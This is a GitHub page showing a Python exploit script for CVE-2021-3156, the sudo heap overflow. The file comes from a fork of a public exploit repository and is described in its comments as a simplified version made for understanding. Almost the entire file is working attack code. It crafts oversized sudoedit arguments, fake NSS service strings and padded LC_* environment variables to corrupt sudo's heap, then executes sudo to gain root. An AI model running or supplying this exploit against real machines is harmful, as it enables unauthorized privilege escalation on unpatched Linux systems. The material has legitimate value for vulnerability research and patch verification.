forked from worawit/CVE-2021-3156
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit_nss_manual.py
executable file
·49 lines (37 loc) · 1.33 KB
/
exploit_nss_manual.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/python3
'''
Exploit for CVE-2021-3156 by sleepya
Simplified version of exploit_nss.py for easy understanding.
- Remove all checking code
- Remove embeded library
- Manual a number of services before group line
This exploit requires:
- glibc with tcache
- nscd service is not running
'''
import os
SUDO_PATH = b"/usr/bin/sudo"
def execve(filename, argv, envp):
from ctypes import cdll, c_char_p, POINTER
libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(envp))(*envp)
libc.execve(filename, cargv, cenvp)
TARGET_OFFSET_START = 0x780
FAKE_USER_SERVICE_PART = [ b"\\" ]*0x18 + [ b"X/X1234\\" ]
FAKE_USER_SERVICE = FAKE_USER_SERVICE_PART * 13
FAKE_USER_SERVICE[-1] = FAKE_USER_SERVICE[-1][:-1] # remove last backslash
argv = [ b"sudoedit", b"-A", b"-s", b"A"*(0xe0)+b"\\", None ]
env = [ b"Z"*(TARGET_OFFSET_START + 0xf - 8 - 1) + b"\\" ] + FAKE_USER_SERVICE
env.extend([
b"LC_CTYPE=C.UTF-8@"+b'A'*0x28+b";A=",
b"LC_NUMERIC=C.UTF-8@"+b'A'*0xd8,
b"LC_TIME=C.UTF-8@"+b'A'*0x28,
b"LC_COLLATE=C.UTF-8@"+b'A'*0x28,
#b"LC_MONETARY=C.UTF-8@"+b'A'*0x28, # for 3 entries in passwd line
b"LC_IDENTIFICATION=C.UTF-8@"+b'A'*0x78, # for filling holes from freed file buffer
b"TZ=:",
None
])
execve(SUDO_PATH, argv, env)